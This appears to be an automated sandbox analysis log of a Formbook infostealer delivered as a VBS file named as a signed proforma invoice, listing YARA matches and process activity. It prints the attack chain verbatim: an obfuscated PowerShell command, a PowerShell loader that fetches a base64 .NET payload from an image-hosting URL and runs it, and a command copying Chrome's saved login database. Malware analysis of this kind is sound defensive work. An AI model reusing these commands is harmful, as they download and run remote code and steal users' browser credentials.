Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0513B2C0 8_2_0513B2C0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0513D2F0 8_2_0513D2F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051C12ED 8_2_051C12ED
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0512AD00 8_2_0512AD00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051D1D5A 8_2_051D1D5A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05123D40 8_2_05123D40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051D7D73 8_2_051D7D73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05138DBF 8_2_05138DBF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0513FDC0 8_2_0513FDC0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0511ADE0 8_2_0511ADE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05120C00 8_2_05120C00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05199C32 8_2_05199C32
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051C0CB5 8_2_051C0CB5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05110CF2 8_2_05110CF2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051DFCF2 8_2_051DFCF2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051DFF09 8_2_051DFF09
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05140F30 8_2_05140F30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05194F40 8_2_05194F40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05121F92 8_2_05121F92
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051DFFB1 8_2_051DFFB1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05112FC8 8_2_05112FC8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_050E3FD5 8_2_050E3FD5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_050E3FD2 8_2_050E3FD2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051DEE26 8_2_051DEE26
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05120E59 8_2_05120E59
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05132E90 8_2_05132E90
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051DCE93 8_2_051DCE93
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05129EB0 8_2_05129EB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051DEEDB 8_2_051DEEDB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05129950 8_2_05129950
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0513B950 8_2_0513B950
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05136962 8_2_05136962
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051229A0 8_2_051229A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051EA9A6 8_2_051EA9A6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05122840 8_2_05122840
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0512A840 8_2_0512A840
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051068B8 8_2_051068B8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0514E8F0 8_2_0514E8F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051238E0 8_2_051238E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051DAB40 8_2_051DAB40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051DFB76 8_2_051DFB76
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_050E9B80 8_2_050E9B80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0513FB80 8_2_0513FB80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051D6BD7 8_2_051D6BD7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0515DBF9 8_2_0515DBF9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051DFA49 8_2_051DFA49
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051D7A46 8_2_051D7A46
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05193A6C 8_2_05193A6C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0511EA80 8_2_0511EA80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05165AA0 8_2_05165AA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051BDAAC 8_2_051BDAAC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051CDAC6 8_2_051CDAC6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02F4DB1E 8_2_02F4DB1E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02F4D9EC 8_2_02F4D9EC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02F4DED4 8_2_02F4DED4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02F4DE88 8_2_02F4DE88
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02F39E50 8_2_02F39E50
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02F32FB0 8_2_02F32FB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02F32D90 8_2_02F32D90
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 013D7E54 appears 88 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0140F290 appears 103 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0137B970 appears 250 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 013C5130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 013FEA12 appears 86 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 0518EA12 appears 84 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 05167E54 appears 85 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 0510B970 appears 248 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 05155130 appears 36 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 0519F290 appears 103 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: Signed Proforma Invoice 3645479_pdf.vbs Initial sample: Strings found which are bigger than 50
Yara signature match
Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2943761942.000000000B429000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: powershell.exe PID: 6236, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: MSBuild.exe PID: 7004, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 4584, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, TaskParameter.cs Task registration methods: 'CreateNewTaskItemFrom'
Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, OutOfProcTaskHostNode.cs Task registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, TaskLoader.cs Task registration methods: 'CreateTask'
Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, RegisteredTaskObjectCacheBase.cs Task registration methods: 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'
Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, CommunicationsUtilities.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, CommunicationsUtilities.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, NodeEndpointOutOfProcBase.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, NodeEndpointOutOfProcBase.cs Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, NodeEndpointOutOfProcBase.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: *.sln
Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MSBuild MyApp.csproj /t:Clean
Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /ignoreprojectextensions:.sln
Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
Source: classification engine Classification label: mal100.spre.troj.spyw.expl.evad.winVBS@17/11@8/6
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\K2No9[1].txt Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2688:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yuysriqt.cbw.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: colorcpl.exe, 00000008.00000003.2008152308.0000000003390000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2931288836.0000000003390000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.1895059088.00000000026E5000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1894768395.000000000287A000.00000004.00000020.00020000.00000000.sdmp, DB1.9.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
